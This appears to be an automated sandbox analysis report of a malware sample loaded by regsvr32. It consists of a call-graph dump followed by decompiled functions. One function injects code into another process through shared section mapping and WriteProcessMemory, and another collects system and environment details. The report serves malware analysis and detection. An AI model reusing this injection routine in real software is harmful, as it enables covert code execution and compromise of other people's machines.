14480 998ddf 2 API calls 14477->14480 14478 991bea 14478->14476 14481 99abf8 6 API calls 14478->14481 14480->14467 14481->14476 14483 99ab4b 4 API calls 14482->14483 14485 992c98 14483->14485 14484 991bda 14491 9919ab 14484->14491 14485->14484 14486 992bee 8 API calls 14485->14486 14489 992cad 14486->14489 14487 992cc8 14487->14484 14488 999a76 RtlAllocateHeap 14487->14488 14488->14484 14489->14487 14490 999a76 RtlAllocateHeap 14489->14490 14490->14487 14492 9919cb 14491->14492 14493 991a0f 14491->14493 14495 99ab4b 4 API calls 14492->14495 14494 991a85 14493->14494 14497 99aaff 4 API calls 14493->14497 14501 991a8d 14494->14501 14558 9916b0 14494->14558 14496 9919d3 14495->14496 14499 99aaff 4 API calls 14496->14499 14500 991a32 14497->14500 14502 9919df 14499->14502 14503 991a6a 14500->14503 14543 99167b 14500->14543 14501->14478 14505 9919fc 14502->14505 14510 99a06e memset 14502->14510 14547 991520 14503->14547 14504 991aed 14508 998ddf 2 API calls 14504->14508 14506 998ddf 2 API calls 14505->14506 14506->14493 14508->14501 14510->14505 14512 99a06e memset 14514 991a9e 14512->14514 14513 99a06e memset 14513->14503 14514->14501 14514->14504 14514->14512 14515 991520 7 API calls 14514->14515 14515->14514 14517 998ddf 2 API calls 14516->14517 14518 996ec8 14517->14518 14519 998ddf 2 API calls 14518->14519 14520 996ed2 14519->14520 14521 998ddf 2 API calls 14520->14521 14522 996edc 14521->14522 14523 998ddf 2 API calls 14522->14523 14524 996ee6 14523->14524 14525 998ddf 2 API calls 14524->14525 14526 996ef0 14525->14526 14527 998ddf 2 API calls 14526->14527 14528 996efa 14527->14528 14529 998ddf 2 API calls 14528->14529 14530 996f04 14529->14530 14540 998ddf HeapFree memset 14530->14540 14541 996f72 14530->14541 14542 996f5c 14530->14542 14531 996fa2 14535 998ddf 2 API calls 14531->14535 14532 998ddf 2 API calls 14536 996fb9 14532->14536 14533 998ddf 2 API calls 14537 996f6a 14533->14537 14534 998ddf 2 API calls 14534->14541 14538 996faa 14535->14538 14536->14477 14539 998ddf 2 API calls 14537->14539 14538->14532 14539->14541 14540->14530 14541->14531 14541->14534 14541->14538 14542->14533 14544 991684 14543->14544 14545 9a36d5 2 API calls 14544->14545 14546 9916a2 14544->14546 14545->14544 14546->14513 14548 99a1f8 GetSystemTimeAsFileTime 14547->14548 14549 99153b 14548->14549 14550 99a1f8 GetSystemTimeAsFileTime 14549->14550 14551 991543 14550->14551 14552 99a398 6 API calls 14551->14552 14553 991568 14552->14553 14554 9915b0 14553->14554 14555 99a1f8 GetSystemTimeAsFileTime 14553->14555 14557 991570 14553->14557 14556 99a2ee 2 API calls 14554->14556 14555->14553 14556->14557 14557->14494 14599 99ac98 14558->14599 14561 99170a 14562 998ddf 2 API calls 14561->14562 14564 991720 14562->14564 14565 991080 2 API calls 14564->14565 14566 99172a 14565->14566 14567 99b330 6 API calls 14566->14567 14568 991745 14567->14568 14569 998d87 2 API calls 14568->14569 14570 991753 14569->14570 14571 9917e5 14570->14571 14572 991080 2 API calls 14570->14572 14586 9917ef 14571->14586 14606 998dc9 RtlAllocateHeap 14571->14606 14573 991766 14572->14573 14575 999124 4 API calls 14573->14575 14576 991776 14575->14576 14578 998d87 2 API calls 14576->14578 14577 991977 14579 998ddf 2 API calls 14577->14579 14580 991783 14578->14580 14581 99198a 14579->14581 14582 9917d9 14580->14582 14585 999124 4 API calls 14580->14585 14583 998ddf 2 API calls 14581->14583 14584 998ddf 2 API calls 14582->14584 14583->14586 14584->14571 14588 99179e 14585->14588 14586->14514 14587 99aaff 4 API calls 14598 9918dc 14587->14598 14589 9917cb 14588->14589 14590 9915f9 3 API calls 14588->14590 14591 9994d4 6 API calls 14589->14591 14592 9917bc 14590->14592 14591->14582 14595 9994d4 6 API calls 14592->14595 14593 991802 14593->14577 14593->14587 14594 9a36d5 2 API calls 14594->14598 14595->14589 14596 99194d 14596->14577 14597 99167b 2 API calls 14596->14597 14597->14596 14598->14594 14598->14596 14600 99acb3 4 API calls 14599->14600 14601 9916ee 14600->14601 14601->14561 14602 9915f9 14601->14602 14605 991616 14602->14605 14603 998e5d 3 API calls 14603->14605 14604 99166b 14604->14561 14605->14603 14605->14604 14606->14593 14617 9957a0 14622 99e565 14617->14622 14620 9957be 14621 9957b5 GetLastError 14621->14620 14647 998dc9 RtlAllocateHeap 14622->14647 14624 99e57c 14625 9957b1 14624->14625 14626 999ab3 RtlAllocateHeap 14624->14626 14625->14620 14625->14621 14627 99e591 14626->14627 14627->14625 14648 99a5fe 14627->14648 14630 999f85 2 API calls 14631 99e5af 14630->14631 14632 999fe4 2 API calls 14631->14632 14633 99e5c4 14632->14633 14634 998d9a 2 API calls 14633->14634 14635 99e5cd 14634->14635 14656 99e3b5 14635->14656 14637 99e5d7 14638 99e5de 14637->14638 14663 99e3f9 14637->14663 14640 998ddf 2 API calls 14638->14640 14641 99e6b1 14640->14641 14643 998ddf 2 API calls 14641->14643 14642 99e5ed 14642->14638 14646 99e684 lstrlenW 14642->14646 14644 99e6bc 14643->14644 14645 998ddf 2 API calls 14644->14645 14645->14625 14646->14642 14647->14624 14649 99a617 14648->14649 14650 998e5d 3 API calls 14649->14650 14654 99a692 14649->14654 14655 99a717 14649->14655 14650->14654 14651 99a6ef 14653 998f63 memset 14651->14653 14651->14655 14652 998ecb lstrlenW 14652->14654 14653->14655 14654->14651 14654->14652 14655->14630 14657 999f85 2 API calls 14656->14657 14658 99e3c7 14657->14658 14676 999eab 14658->14676 14661 998d9a 2 API calls 14662 99e3dc 14661->14662 14662->14637 14664 999c50 2 API calls 14663->14664 14665 99e412 CoInitializeEx 14664->14665 14666 999f85 2 API calls 14665->14666 14667 99e42d 14666->14667 14668 999f85 2 API calls 14667->14668 14669 99e43e 14668->14669 14670 998d9a 2 API calls 14669->14670 14671 99e45a 14670->14671 14672 998d9a 2 API calls 14671->14672 14673 99e470 14672->14673 14674 998ddf 2 API calls 14673->14674 14675 99e47b 14674->14675 14675->14642 14677 9998e9 2 API calls 14676->14677 14678 999ecc 14677->14678 14679 999c50 2 API calls 14678->14679 14680 999eed 14679->14680 14680->14661 14710 99fbd6 14713 998dc9 RtlAllocateHeap 14710->14713 14712 99fbe6 14713->14712 14724 9957c3 14725 999eab 4 API calls 14724->14725 14726 9957db 14725->14726 14727 9958c4 14726->14727 14743 998dc9 RtlAllocateHeap 14726->14743 14729 9957f2 14729->14727 14730 999f6b 2 API calls 14729->14730 14731 99580a 14730->14731 14732 999fa5 2 API calls 14731->14732 14733 99581f 14732->14733 14734 998d87 2 API calls 14733->14734 14735 995827 14734->14735 14736 998ddf 2 API calls 14735->14736 14737 995842 14736->14737 14738 99b787 2 API calls 14737->14738 14740 995850 14738->14740 14739 99c402 11 API calls 14739->14740 14740->14739 14741 9958b9 14740->14741 14742 998ddf 2 API calls 14741->14742 14742->14727 14743->14729 15395 99286e 15396 992885 15395->15396 15397 992964 15395->15397 15399 99bfc8 2 API calls 15396->15399 15398 999e22 2 API calls 15397->15398 15400 992970 15398->15400 15401 992891 15399->15401 15401->15397 15425 999f14 15401->15425 15404 992956 15406 998ddf 2 API calls 15404->15406 15405 999b26 2 API calls 15407 9928b5 15405->15407 15406->15397 15408 99bf56 RtlAllocateHeap 15407->15408 15409 9928c8 15408->15409 15410 99293d 15409->15410 15411 999b26 2 API calls 15409->15411 15412 998ddf 2 API calls 15410->15412 15413 9928d4 15411->15413 15414 99294b 15412->15414 15415 99109a 2 API calls 15413->15415 15416 998ddf 2 API calls 15414->15416 15417 9928e0 15415->15417 15416->15404 15418 999c50 2 API calls 15417->15418 15419 9928f1 15418->15419 15420 998d9a 2 API calls 15419->15420 15421 9928ff 15420->15421 15421->15410 15422 99b787 2 API calls 15421->15422 15423 99291d 15422->15423 15424 998ddf 2 API calls 15423->15424 15424->15410 15426 999f1d 15425->15426 15428 9928a3 15425->15428 15429 998dc9 RtlAllocateHeap 15426->15429 15428->15404 15428->15405 15429->15428 14819 991fe0 14820 99200b 14819->14820 14821 992013 14819->14821 14822 999b26 2 API calls 14821->14822 14823 992023 14822->14823 14824 992058 14823->14824 14851 999ca5 14823->14851 14826 9998e9 2 API calls 14824->14826 14828 992076 14826->14828 14829 99bfc8 2 API calls 14828->14829 14831 992088 14829->14831 14830 999b26 2 API calls 14830->14824 14832 99208f 14831->14832 14858 99c4d1 memset 14831->14858 14834 998ddf 2 API calls 14832->14834 14835 992209 14834->14835 14836 998ddf 2 API calls 14835->14836 14837 992214 14836->14837 14838 998ddf 2 API calls 14837->14838 14846 992220 14838->14846 14839 99209f 14839->14832 14841 999c50 RtlAllocateHeap lstrcatW 14839->14841 14847 999f85 lstrlenW RtlAllocateHeap 14839->14847 14848 998d9a HeapFree memset 14839->14848 14849 99b787 memset GetExitCodeProcess 14839->14849 14850 998ddf HeapFree memset 14839->14850 14840 992248 14843 999e22 2 API calls 14840->14843 14841->14839 14842 99223d 14845 998ddf 2 API calls 14842->14845 14843->14820 14844 998ddf 2 API calls 14844->14846 14845->14840 14846->14840 14846->14842 14846->14844 14847->14839 14848->14839 14849->14839 14850->14839 14854 999cbc 14851->14854 14853 992041 14853->14820 14853->14830 14873 998dc9 RtlAllocateHeap 14854->14873 14855 999cfd lstrcatA 14856 999cf2 14855->14856 14857 999d11 lstrcatA 14855->14857 14856->14853 14856->14855 14857->14856 14874 998dc9 RtlAllocateHeap 14858->14874 14860 99c4f8 14861 999ab3 RtlAllocateHeap 14860->14861 14872 99c57c 14860->14872 14862 99c516 14861->14862 14863 999ab3 RtlAllocateHeap 14862->14863 14864 99c529 14863->14864 14865 999ab3 RtlAllocateHeap 14864->14865 14866 99c53d 14865->14866 14867 999f85 2 API calls 14866->14867 14868 99c54a 14867->14868 14869 998d9a 2 API calls 14868->14869 14870 99c570 14869->14870 14871 999ab3 RtlAllocateHeap 14870->14871 14871->14872 14872->14839 14873->14856 14874->14860

            Executed Functions

            Function 0099D538 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 95%
            			E0099D538(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x9af8d4; // 0x452fc00
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E0099F15B(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x9af9d0; // 0x452fa00
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x9af8d0; // 0x452f8c0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x9ace70; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x9af8d0; // 0x452f8c0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E00998E2E( *0x9af8d4, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E00998DDF( &_v36, 0x1ac4);
					_t119 =  *0x9af8d4; // 0x452fc00
					_t155 =  *0x9af8e8; // 0x990000
					_v36 = _t119;
					 *0x9af8e8 = _v8;
					 *0x9af8d4 = _t163;
					E00998EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E0099D4B7(_v16, _v8, _v44);
					_t124 = E0099A5D0("Jjischug");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x9af8e8 = _t155;
						 *0x9af8d4 = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































            0x0099d53e
            0x0099d544
            0x0099d546
            0x0099d54a
            0x0099d54c
            0x0099d54f
            0x0099d552
            0x0099d555
            0x0099d558
            0x0099d55b
            0x0099d566
            0x0099d569
            0x0099d570
            0x0099d570
            0x0099d575
            0x0099d578
            0x0099d57a
            0x0099d57d
            0x0099d586
            0x0099d77f
            0x0099d77f
            0x0099d782
            0x0099d785
            0x0099d78a
            0x0099d790
            0x0099d793
            0x0099d793
            0x0099d796
            0x0099d79a
            0x0099d79c
            0x0099d7b1
            0x0099d7b1
            0x0099d7bb
            0x0099d7c5
            0x0099d7c5
            0x0099d7cc
            0x0099d7cc
            0x0099d595
            0x0099d5af
            0x00000000
            0x00000000
            0x0099d5b5
            0x0099d5bd
            0x0099d5c5
            0x0099d5cb
            0x0099d5d2
            0x0099d5da
            0x0099d5db
            0x0099d5e2
            0x0099d5e5
            0x0099d5e6
            0x0099d5ed
            0x0099d5f0
            0x0099d5f7
            0x0099d5f8
            0x0099d5fb
            0x0099d607
            0x0099d629
            0x0099d631
            0x0099d634
            0x0099d63f
            0x0099d63f
            0x0099d631
            0x0099d65b
            0x0099d66a
            0x0099d66d
            0x0099d672
            0x00000000
            0x0099d69c
            0x0099d6ac
            0x0099d6ae
            0x0099d6b5
            0x00000000
            0x00000000
            0x0099d6ca
            0x0099d6dd
            0x0099d6f1
            0x0099d6fd
            0x0099d702
            0x0099d707
            0x0099d70d
            0x0099d713
            0x0099d71b
            0x0099d72b
            0x0099d737
            0x0099d741
            0x0099d749
            0x0099d74e
            0x0099d751
            0x0099d759
            0x0099d759
            0x0099d759
            0x0099d75c
            0x0099d760
            0x0099d761
            0x0099d765
            0x0099d769
            0x0099d772
            0x0099d778
            0x00000000
            0x0099d778
            0x0099d753
            0x0099d757
            0x00000000
            0x00000000
            0x00000000
            0x0099d757

            APIs
            • NtCreateSection.NTDLL(0099DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0099D5AA
            • RegisterClassExA.USER32(?), ref: 0099D5FE
            • CreateWindowExA.USER32 ref: 0099D629
            • DestroyWindow.USER32(00000000), ref: 0099D634
            • UnregisterClassA.USER32 ref: 0099D63F
            • NtMapViewOfSection.NTDLL(0099DA07,00000000), ref: 0099D66A
            • NtMapViewOfSection.NTDLL(0099DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0099D691
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0099D6D7
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0099D6F1
              • Part of subcall function 00998DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00998E25
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,00996297), ref: 0099D769
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0099D7B1
            • NtClose.NTDLL(00000000), ref: 0099D7C5
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: 8107dfc178fe32ce91920b3658d792e857edc3456d9da6fa0936f7eff64be523
            • Instruction ID: 10ca021678b6ea6aefaf286b704ae999149804fc848d9c320a0714be5cb57935
            • Opcode Fuzzy Hash: 8107dfc178fe32ce91920b3658d792e857edc3456d9da6fa0936f7eff64be523
            • Instruction Fuzzy Hash: FC8115B5A11219AFDB10DFD8DC84AAEBBF8FF09744F14406AE505A7260D774AD00DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099DFC2 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 79%
            			E0099DFC2(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x9af8e8; // 0x990000
				_t68 = E00998DC9(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x9af8d0; // 0x452f8c0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E009A35A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x9af8d0; // 0x452f8c0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E009997E9(_t194, _t207);
					}
					_t75 =  *0x9af8d0; // 0x452f8c0
					_t77 = E0099CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E0099CB85( *_t77) == 0) {
						_t79 = E0099CA5A(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E0099F3A0(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E0099F365(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x9af8d8; // 0x452fab0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E0099DFBB(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E009997E9(_t149, _t211);
					}
					_t92 = E0099C85A();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E0099C64D(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E00999BD5(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E00999803(_t149, _t36);
					_t97 = E0099E34A(_t196, E0099A5D0(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E0099C870(_t97, _t37, _t216);
					_t99 =  *0x9af8d0; // 0x452f8c0
					_t101 = E0099CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E00998F63(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E0099DDBE(_t100);
					_t106 = E0099DDE7(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E00999F85(_t105, 0xf73);
					_t177 =  *0x9af8d0; // 0x452f8c0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x9af8d0; // 0x452f8c0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E00998D9A( &_v8);
					_t113 =  *0x9af8d0; // 0x452f8c0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E00999FE4(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x9af8d0; // 0x452f8c0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x9af8d0; // 0x452f8c0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x9af8d0; // 0x452f8c0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x9af8d0; // 0x452f8c0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x9af8d0; // 0x452f8c0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x9af8d0; // 0x452f8c0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E009A35A9(E0099E34A(_t62, E0099A5D0(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E009A357B( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E009998D0(_t66, _t191);
					_t134 = E0099DB68(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































            0x0099dfc2
            0x0099dfcc
            0x0099dfd8
            0x0099dfdd
            0x0099dfe2
            0x0099dfef
            0x0099dff5
            0x0099dffa
            0x0099e000
            0x0099e010
            0x0099e015
            0x0099e01a
            0x0099e01a
            0x0099e02a
            0x0099e030
            0x0099e032
            0x0099e03b
            0x0099e03b
            0x0099e041
            0x0099e04e
            0x0099e053
            0x0099e059
            0x0099e062
            0x0099e070
            0x0099e077
            0x0099e07c
            0x0099e07c
            0x0099e07d
            0x0099e064
            0x0099e064
            0x0099e064
            0x0099e083
            0x0099e089
            0x0099e08e
            0x0099e094
            0x0099e099
            0x0099e09f
            0x0099e09f
            0x0099e0a8
            0x0099e0ae
            0x0099e0b2
            0x0099e0b9
            0x0099e0c0
            0x0099e0c7
            0x0099e0cb
            0x0099e0d2
            0x0099e0d3
            0x0099e0d5
            0x0099e0da
            0x0099e0e1
            0x0099e0e3
            0x0099e0e3
            0x0099e0f3
            0x0099e0f8
            0x0099e0f8
            0x0099e105
            0x0099e10b
            0x0099e110
            0x0099e112
            0x0099e11b
            0x0099e11b
            0x0099e123
            0x0099e128
            0x0099e128
            0x0099e12e
            0x0099e139
            0x0099e13e
            0x0099e146
            0x0099e14c
            0x0099e154
            0x0099e166
            0x0099e16c
            0x0099e174
            0x0099e179
            0x0099e186
            0x0099e197
            0x0099e19d
            0x0099e1a2
            0x0099e1a5
            0x0099e1a8
            0x0099e1b5
            0x0099e1bb
            0x0099e1c5
            0x0099e1c5
            0x0099e1cb
            0x0099e1d3
            0x0099e1de
            0x0099e1e3
            0x0099e1e9
            0x0099e1eb
            0x0099e1f8
            0x0099e1f9
            0x0099e1fa
            0x0099e205
            0x0099e207
            0x0099e20e
            0x0099e20e
            0x0099e218
            0x0099e21d
            0x0099e222
            0x0099e222
            0x0099e228
            0x0099e22f
            0x0099e230
            0x0099e23d
            0x0099e250
            0x0099e255
            0x0099e25a
            0x0099e263
            0x0099e263
            0x0099e269
            0x0099e26e
            0x0099e274
            0x0099e27a
            0x0099e27f
            0x0099e288
            0x0099e28a
            0x0099e291
            0x0099e291
            0x0099e297
            0x0099e29f
            0x0099e2a4
            0x0099e2a5
            0x0099e2aa
            0x0099e2b3
            0x0099e2b5
            0x0099e2c0
            0x0099e2c0
            0x0099e2c9
            0x0099e2d1
            0x0099e2d8
            0x0099e2dd
            0x0099e2ec
            0x0099e304
            0x0099e30b
            0x0099e319
            0x0099e324
            0x0099e325
            0x0099e329
            0x0099e32f
            0x0099e330
            0x0099e338
            0x0099e33d
            0x00000000
            0x0099e345
            0x0099e349

            APIs
              • Part of subcall function 00998DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            • GetCurrentProcessId.KERNEL32 ref: 0099DFE9
            • GetLastError.KERNEL32 ref: 0099E0E3
            • GetSystemMetrics.USER32(00001000), ref: 0099E0F3
            • GetVersionExA.KERNEL32(00000000), ref: 0099E1A8
              • Part of subcall function 0099CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,00990000), ref: 0099CAFE
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0099E1D3
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: ee876f40c2b865be8ba3e9b29a8a3d1ce0e0f88a8456c2d05261417abc3da434
            • Instruction ID: 61968d8127c8ca164bb16f926e8daa30c827cc8abf89c4ffe0667ae65810118e
            • Opcode Fuzzy Hash: ee876f40c2b865be8ba3e9b29a8a3d1ce0e0f88a8456c2d05261417abc3da434
            • Instruction Fuzzy Hash: B0915C71700605AFDB04EBB8DC49FEAB7E8FF49300F044169F51AD7291EB74AA448BA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099D9DE Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
